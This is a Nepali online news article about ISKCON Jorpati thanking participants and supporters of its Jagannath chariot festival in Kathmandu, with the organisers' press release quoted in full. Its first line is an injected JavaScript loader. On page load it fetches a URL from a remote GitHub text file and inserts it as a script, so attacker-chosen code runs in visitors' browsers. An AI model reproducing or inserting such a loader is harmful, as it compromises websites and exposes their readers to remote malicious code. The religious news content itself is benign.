;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ |
गत मंसिर ३० गते भएको श्री श्री जगन्नाथ रथ यात्रामा सहयोग गर्ने सबैलाई आयोजकले धन्यवाद दिएको छ | बिशेष गरि इस्कोन जोरपाटीले आयोजना गरेको बृहत रथयात्रा तथा महोत्सब चाबहिल चोक देखि जोरपाटीको नारायणटार सम्म भएको थियो |
आयोजको अनुसार झन्डै ५ हजार जनाको उपस्थिथिमा भएको सो महोत्सबमा सहभागी हुने र सहयोग गर्ने सबैलाई बिज्ञप्ति निकालेर धन्यवाद दिएको हो |
कार्यक्रमको फोटो हेर्न यो लिंकमा थिच्नुहोस https://m.facebook.com/story.php?story_fbid=pfbid02XPhox5DAp1DFYA6yusPM7Sz7da9Pp1es9xx9VgoDc1GjiDeKiCoa5xxtgo7neLxDl&id=100046718450309&mibextid=Nif5oz
विज्ञप्ति जस्ताको तेस्तै
हाम्रो इस्कोन जोरपाटीले विगत १२ वर्ष देखी श्री जगन्नाथ रथयात्रा संचालन गर्दै आएको ब्यहोरा गर्वका साथ अवगत गराउदछौं । यस वर्ष पनि २०८० /०८/३० गते शनिवारका दिन सभ्य तथा भब्यताका साथ उक्त कार्यक्रम शु-सम्पन्न गरीयो ।
यस महा महोत्सवमा हाम्रा सहयोगी संस्थाहरु, मित्रहरु, शुभचिन्तकहरु तथा सहभागिहरुलाई यसै विज्ञप्ति मार्फत धन्यवाद अर्पण गर्न चाहन्छौं । विशेषतः प्रमुख अतिथि स्वामी श्री पद्मधराचार्य ज्यू, विशेष अतिथि गोकर्णेश्वर नगरपालीकाका मेयर श्रीमान दिपक रिसाल ज्यू, उपमेयर श्रीमती सान्नानी लामा ज्यू, तथा अन्य सहयोगी संघ, संस्थाहरु, SCOUT अरुणीमा मा.वि., नेपाल अर्थोपेडिक अस्पताल, खगेन्द्र मेमोरीयल विशेष मा.वि., लगायत विभिन्न सामाजिक संघ-संस्थाहरु, महिला समुहहरु एवम् गोकर्णेश्वर नगरपालीका वडा नं. ५ र ६, काठमाडौं महानगरपालीका वडा नं. ६ र ७, नेपाल प्रहरी, ट्राफिक प्रहरी आदिलाई धेरै धेरै धन्यवाद दिदै भविष्यमा पनि यस्तै साथ र सहयोगको अपेक्षा राख्दछौं ।
हामी पुनः हाम्रा सहयोगी मित्रहरु प्रति आभार ब्यक्त गर्दै भगवान श्री श्री श्री जगन्नाथ, वलदेभ, सुभद्राको कृपा प्राप्तहोस भनि प्रार्थना गर्दछौं । यस कार्यक्रम आयोजना गर्दा भएका कमी कमजोरीहरु प्रति क्षमा माग्दै यहाँहरुको सुझाव, सल्लाहको आशा गर्दछौं र आगामी दिनहरुमा सुधार गरी कार्यक्रम गर्ने ब्यहोरा जानकारी गराउदछौं ।
कार्यक्रम संयोजक
कार्यक्रम व्यवस्थापक
डा. श्री नारायणकृष्ण श्रेष्ठ
श्री श्रीराम धौगोडा
हरे कृष्ण हरे कृष्ण कृष्ण कृष्ण हरे हरे, हरे राम हरे राम राम राम हरे हरे ।
फेसबुक प्रतिक्रियाहरु